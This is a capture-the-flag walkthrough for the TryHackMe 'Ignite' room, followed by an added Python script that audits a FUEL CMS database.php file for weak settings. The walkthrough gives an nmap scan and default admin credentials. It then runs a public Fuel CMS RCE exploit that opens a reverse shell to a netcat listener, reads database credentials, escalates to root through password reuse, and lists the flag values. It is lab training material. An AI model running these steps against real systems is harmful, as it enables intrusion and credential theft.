Room Link: https://tryhackme.com/r/room/ignite
STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.178.241
FINDING
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
--------------------------------------------------------------------------------------------------------
STEP2
http://10.10.178.241/
FINDING
To access the FUEL admin, go to:
http://10.10.178.241/fuel
User name: admin
Password: admin (you can and should change this password and admin user information after logging in)
---------------------------------------------------------------------------------------------------------
STEP3
Use the Fuel CMS 1.4.1 RCE exploit from:
https://github.com/ice-wzl/Fuel-1.4.1-RCE-Updated
python3 /root/Desktop/Fuel-Updated.py http://10.10.178.241 10.17.65.196 4422
and catch the reverse shell in another terminal with: nc -nvlp 4422
FINDING
cd /
ls -la
cat flag.txt
6470e394cbf6dab6a91682cc8585059b
---------------------------------------------------------------------------------------------------------
STEP4
http://10.10.237.130/
FINDING
The page says to change the database configuration found in fuel/application/config/database.php
---------------------------------------------------------------------------------------------------------
STEP5
cd /var/www/html/fuel/application/config
ls -la
cat database.php
FINDING
dsn = ,
hostname = localhost,
username = root,
password = mememe,
database = fuel_schema,
dbdriver = mysqli,
dbprefix = ,
---------------------------------------------------------------------------------------------------------
STEP6
su root    # password: mememe (the database password from STEP5 is reused for the root account)
whoami
root
cd /root
cat root.txt
b9bbcb33e11b80be759c4e844862482d
---------------------------------------------------------------------------------------------------------
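
Added example (not part of the original walkthrough or of FUEL CMS): a small Python audit of database.php for the weaknesses STEP5 and STEP6 rely on, namely a database account named root with a short password kept in a file other local users can read. The PHP sample is constructed from the values shown in STEP5 and assumes the CodeIgniter-style array layout; the 12-character minimum is an arbitrary threshold chosen here.

```python
import os
import re
import stat
import tempfile

# Constructed sample: CodeIgniter-style array (assumed layout), values from STEP5.
SAMPLE = """<?php
$db['default'] = array(
    'dsn' => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
    'dbprefix' => '',
);
"""

# Matches quoted 'key' => 'value' pairs; unquoted values (TRUE, FALSE) are skipped.
PAIR = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")

def parse_db_config(text):
    """Return the quoted key/value pairs of a database.php file as a dict."""
    return dict(PAIR.findall(text))

def audit(path, min_len=12):
    """Return a list of finding strings for one database.php file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        cfg = parse_db_config(fh.read())
    findings = []
    if cfg.get("username") == "root":
        findings.append("app connects to the database as root")
    if len(cfg.get("password", "")) < min_len:
        findings.append("database password shorter than %d characters" % min_len)
    if os.stat(path).st_mode & stat.S_IROTH:
        findings.append("file is world-readable")
    return findings

def demo():
    """Audit the constructed sample, written to a temp file with mode 0644."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "database.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE)
        os.chmod(path, 0o644)
        return audit(path)

if __name__ == "__main__":
    for line in demo():
        print("[!]", line)
```

A clean result here does not cover password reuse: the database password must also differ from every OS account password, which is what STEP6 depends on.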